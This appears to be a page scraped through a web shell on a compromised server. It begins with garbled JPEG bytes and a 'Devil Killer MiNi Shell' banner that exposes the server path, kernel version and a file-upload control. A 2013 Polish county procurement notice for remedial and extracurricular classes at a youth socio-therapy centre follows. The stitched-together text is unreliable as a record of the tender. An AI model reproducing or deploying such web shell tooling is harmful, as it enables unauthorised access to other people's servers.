JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130718/147097-N-2013.html

<p class="kh_header"><b>Brzesko: Zajęcia wyrównawcze cz. II oraz zajęcia pozalekcyjne cz. II w ramach projektu - ICT - Inspirujące - Ciekawe - Twórcze - program realizacji zajęć pozalekcyjnych w małopolskich ośrodkach wychowawczych i socjoterapii</b><br>
<b>Numer ogłoszenia: 147097 - 2013; data zamieszczenia: 18.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Brzesku , ul. Głowackiego 51, 32-800 Brzesko, woj. małopolskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatbrzeski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zajęcia wyrównawcze cz. II oraz zajęcia pozalekcyjne cz. II w ramach projektu - ICT - Inspirujące - Ciekawe - Twórcze - program realizacji zajęć pozalekcyjnych w małopolskich ośrodkach wychowawczych i socjoterapii.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie zajęć wyrównawczych z zakresu: języka polskiego, języka niemieckiego, języka angielskiego, matematyki, fizyki, biologii oraz zajęć pozalekcyjnych - w formie warsztatów z obsługi nowoczesnych multimediów, grafiki komputerowej, a także zajęć sportowych dla wychowanków Młodzieżowego Ośrodka Socjoterapii w Łysej Górze, 32-853 Łysa Góra 274 (zwanym dalej MOS), dla którego organem prowadzącym jest Powiat Brzeski,  współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Przedmiot zamówienia podzielony został na części (Zadania), tj.:
Zadanie 1. Zajęcia wyrównawcze dla gr. I z języka polskiego. Zadanie 2. Zajęcia wyrównawcze dla gr. II z języka polskiego. Zadanie 3. Zajęcia wyrównawcze dla gr. I z języka niemieckiego. Zadanie 4. Zajęcia wyrównawcze dla gr. II z języka niemieckiego. Zadanie 5. Zajęcia wyrównawcze dla gr. I z języka angielskiego. Zadanie 6. Zajęcia wyrównawcze dla gr. II z języka angielskiego. Zadanie 7. Zajęcia wyrównawcze dla gr. I z matematyki. Zadanie 8. Zajęcia wyrównawcze dla gr. II z matematyki. Zadanie 9. Zajęcia wyrównawcze dla gr. I z fizyki. Zadanie 10. Zajęcia wyrównawcze dla gr. II z fizyki. Zadanie 11. Zajęcia wyrównawcze dla gr. I z biologii. Zadanie 12. Zajęcia wyrównawcze dla gr. II z biologii. Zadanie 13. Zajęcia pozalekcyjne - warsztaty z obsługi nowoczesnych multimediów. Zadanie 14. Zajęcia pozalekcyjne - warsztaty z grafiki komputerowej. Zadanie 15. Zajęcia sportowe.
Zajęcia realizowane są w ramach projektu ,,ICT - Inspirujące - Ciekawe - Twórcze - program realizacji zajęć pozalekcyjnych w małopolskich ośrodkach wychowawczych i socjoterapii,,, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Szczegółowy opis każdych zajęć zawarto w Załączniku Nr 1 do Specyfikacji Istotnych Warunków Zamówienia (Opis przedmiotu zamówienia). 2. Szczegółowe wymagania Zamawiającego wobec Wykonawcy w ramach realizacji niniejszego zamówienia: 1) Zamawiający dopuszcza składanie ofert częściowych w podziale na w/w Zadania. 2) Szczegółowy opis poszczególnych części (Zadań) zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia (Opis przedmiotu zamówienia). 3) Na co najmniej 3 dni  robocze przed rozpoczęciem zajęć, Wykonawca będzie zobligowany przekazać do Zamawiającego harmonogram planowanych zajęć zawierający daty i godziny wraz z tematami rozpisanymi zgodnie z tematyką zajęć opisaną w zał. nr 1 do SIWZ. Szczegółowy harmonogram realizacji Zadania musi być uzgodniony (podpisany) z Koordynatorem projektu oraz Dyrektorem Młodzieżowego Ośrodka Socjoterapii w Łysej Górze. Harmonogram należy ułożyć z uwzględnieniem specyfiki rozkładu dnia MOS - w szczególności uwzględniając czas na naukę własną, zajęcia wychowawcze w grupach, godziny posiłków itp. Realizacja zajęć może przebiegać w pojedynczych godzinach danego dnia. Harmonogram powinien być dostosowany do zajęć szkolnych uczniów oraz nie kolidować z innymi wydarzeniami jak uroczystości szkolne, akademie, wycieczki szkolne. 4) Zamawiający wymaga, aby zajęcia planowane były zgodnie z wytycznymi określonymi w zał. nr 1 do SIWZ. 5) Zamawiający przyjmuje, iż na potrzeby realizacji przedmiotu zamówienia godzina jest godziną lekcyjną, tzn. równa się 45 minutom. Jeżeli zajęcia będą trwać dłużej niż 45 minut zaleca się by Wykonawca uwzględnił podczas prowadzenia zajęć także czas na przerwę niezbędną dla odpoczynku i właściwego samopoczucia uczestników. 6) Zajęcia odbywać będą się na terenie MOS, w salach udostępnionych nieodpłatnie dla Wykonawcy, natomiast w przypadku realizacji Zadania 15 zajęcia odbywać się będą nieodpłatnie na terenie obiektów należących do MOS. 7) Wykonawca może w trakcie przeprowadzania zajęć korzystać z pomocy dydaktycznych będących własnością MOS wyszczególnionych w zał. nr 1 do SIWZ, przy czym odpowiada on za wszelkie uszkodzenia powstałe na wskutek niewłaściwego ich użytkowania. Dyrektor MOS lub osoba przez niego upoważniona udostępnia sprzęt oraz dokonuje sprawdzenia jego stanu w obecności Wykonawcy każdorazowo przed rozpoczęciem i po zakończeniu zajęć. Pozostały sprzęt i materiały niezbędne do realizacji Zadania (części) Wykonawca zapewnia we własnym zakresie na swój koszt. 8) Zamawiający wymaga, aby Wykonawca zapewnił w ramach Zadań: od 1 do 14 na własność każdemu uczestnikowi zajęć: a)	materiały szkoleniowe/skrypty potrzebne do realizacji zajęć, b) materiały biurowe w postaci: bloku szkolnego w formacie A4 w kratkę, min. 50 kartek, teczkę z gumką w twardej oprawie oraz ponadto w ramach Zadania 14 - pamięć przenośną 
min. 4 GB (pen-drive). Przekazywane materiały biurowe muszą być nowe, nieużywane, a materiały szkoleniowe/skrypty muszą być sporządzone w sposób czytelny. 9) Zamawiający wymaga by zajęcia prowadziła osoba z wykazu osób uczestniczących w wykonywaniu zamówienia, a w przypadku jej śmierci, długotrwałej choroby lub innej ważnej przyczyny, Wykonawca będzie zobligowany do złożenia stosownego, pisemnego uzasadnienia z określeniem powodu niemożliwości prowadzenia zajęć przez wykazaną osobę oraz wskazania innej osoby spełniającej warunki udziału w postępowaniu, o których mowa 
w rozdziale V Specyfikacji Istotnych Warunków Zamówienia. Wykonawca będzie również zobowiązany do przedstawienia na żądanie Zamawiającego dokumentów potwierdzających spełnienie w/w warunków. 10) Wykonawca jest zobowiązany prowadzić odpowiednią dokumentację w postaci: dziennika zajęć  - w dzienniku tym Wykonawca będzie zobowiązany w szczególności umieścić: imiona i nazwiska osób szkolonych, plan zajęć (tematyka i odpowiedni wymiar godzin), realizacja planu zajęć (data, liczba godzin zajęć, liczba osób obecnych, treść zajęć, podpis prowadzącego zajęcia), sprawozdanie ze szkolenia (liczba osób rozpoczynających i kończących szkolenie, liczba wydanych zaświadczeń), materiałów biurowych, szkoleniowych/skryptów oraz wszelkich innych dokumentów i pomocy jeśli wymaga tego specyfikacja zajęć określona szczegółowo w załączniku nr 1 do SIWZ, a także listy odbioru wydanych zaświadczeń. Sporządzając listy przekazania uczniom wszelkich zaświadczeń, przedmiotów Wykonawca musi uzyskać podpis każdego ucznia potwierdzający jego faktyczny odbiór. Brak takiego podpisu jest dla Zamawiającego równoznaczny z nieprzekazaniem przedmiotu, o którym mowa wyżej. 11) W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do: a) oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, b) poinformowania w pierwszym dniu zajęć uczestników o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, c) stosowania na wszystkich dokumentach, materiałach szkoleniowych, w trakcie wykonywania przedmiotowego zamówienia znaków takich jak: logo POKL, logo Unii Europejskiej wraz z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, logo Województwa Małopolskiego, logo projektu, hasło promocyjne POKL. 12) CERTYFIKATY i ZAŚWIADCZENIA dla zajęć:
Każdy z uczestników zajęć posiadający min. 80% obecności otrzyma zaświadczenie i certyfikat potwierdzające ukończenia zajęć. Uczniowie, którzy uczestniczyli w zajęciach, ale mają poniżej 80 % obecności otrzymają zaświadczenie o uczestnictwie. Na zaświadczeniu lub/i certyfikacie o ukończeniu zajęć winny zostać umieszczone: imię i nazwisko uczestnika zajęć, szczegółowy zakres programowy zajęć (wraz z podaniem ilości godzin poszczególnych tematów zajęć), logo projektu - wg wzoru przekazanego przez Koordynatora projektu na etapie realizacji zamówienia oraz zapis właściwy dla nazwy zajęć występujący w nazwie każdego Zadania, tj.: np. dla Zadania 1:  Zajęcia wyrównawcze z języka polskiego będzie to sentencja: ,,Zajęcia wyrównawcze z języka polskiego współfinansowane przez Unię Europejską z Europejskiego Funduszu Społecznego,,. 13) Wykonawca po zakończeniu zajęć przeprowadzi wśród uczestników zajęć ocenę merytoryczną i techniczną  przebiegu zajęć na podstawie anonimowej ankiety oceniającej. 14)	W przypadku śmierci uczestnika lub jego rezygnacji Wykonawca zamiast zaświadczenia o ukończeniu / uczestnictwie w zajęciach, o których mowa pkt 12 przekaże Zamawiającemu oświadczenie ze wskazaniem powodu przerwania zajęć danego uczestnika. 15) W salach i pracowniach, podczas prowadzenia zajęć bez zgody Koordynatora projektu nie mogą  przebywać inne osoby niż uczestnicy zajęć, osoby szkolące (instruktorzy, wykładowcy) oraz opiekun oddelegowany przez Zamawiającego. 16) Wykonawca po zakończeniu zajęć jest zobowiązany przekazać Zamawiającemu kserokopie zaświadczeń / certyfikatów, o których mowa w Rozdz. II ust. 2 pkt 12 oraz oryginałów dokumentów, o których mowa w punktach 10, 13 i 14 SIWZ. 17) Zamawiający zastrzega sobie prawo do pełnej kontroli przeprowadzanych zajęć, w tym także do sporządzania zdjęć oraz wszelkiej dokumentacji obrazującej realizację przedmiotu umowy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Dla Zadania 1. Zajęcia wyrównawcze dla gr. I z języka polskiego: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu języka polskiego, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii, b) Dla Zadania 2. Zajęcia wyrównawcze dla gr. II z języka polskiego: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu języka polskiego, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii, c) Dla Zadania 3. Zajęcia wyrównawcze dla gr. I z języka niemieckiego: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu języka niemieckiego, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii, d) Dla Zadania 4. Zajęcia wyrównawcze dla gr. II z języka niemieckiego: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu języka niemieckiego, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii, e) Dla Zadania 5. Zajęcia wyrównawcze dla gr. I z języka angielskiego: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu języka angielskiego, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii, f) Dla Zadania 6. Zajęcia wyrównawcze dla gr. II z języka angielskiego: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu języka angielskiego, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii, g) Dla Zadania 7. Zajęcia wyrównawcze dla gr. I z matematyki: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu matematyki, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii, h) Dla Zadania 8. Zajęcia wyrównawcze dla gr. II z matematyki: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu matematyki, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii, i) Dla Zadania 9. Zajęcia wyrównawcze dla gr. I z fizyki: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu fizyki, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii, j) Dla Zadania 10. Zajęcia wyrównawcze dla gr. II z fizyki: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu fizyki, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii, k) Dla Zadania 11. Zajęcia wyrównawcze dla gr. I z biologii: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu biologii, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii, l) Dla Zadania 12. Zajęcia wyrównawcze dla gr. II z biologii: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu biologii, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii, m) Dla Zadania 13. Zajęcia pozalekcyjne - warsztaty z obsługi nowoczesnych multimediów: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu informatyki, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii, n) Dla Zadania 14. Zajęcia pozalekcyjne - warsztaty z grafiki komputerowej: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu informatyki, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii, o) Dla Zadania 15. Zajęcia sportowe: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada: wyższe wykształcenie z zakresu wychowania fizycznego, przygotowanie pedagogiczne, a ponadto ukończyła: studia wyższe w zakresie resocjalizacji lub socjoterapii lub zakład kształcenia nauczycieli w specjalności resocjalizacja lub socjoterapia, lub studia podyplomowe lub kurs kwalifikacyjny w zakresie resocjalizacji lub socjoterapii.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamowienia.powiatbrzeski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Brzesku Wydział Edukacji (I p., pok. 103) ul. Piastowska 2B, 32-800 Brzesko.</p>
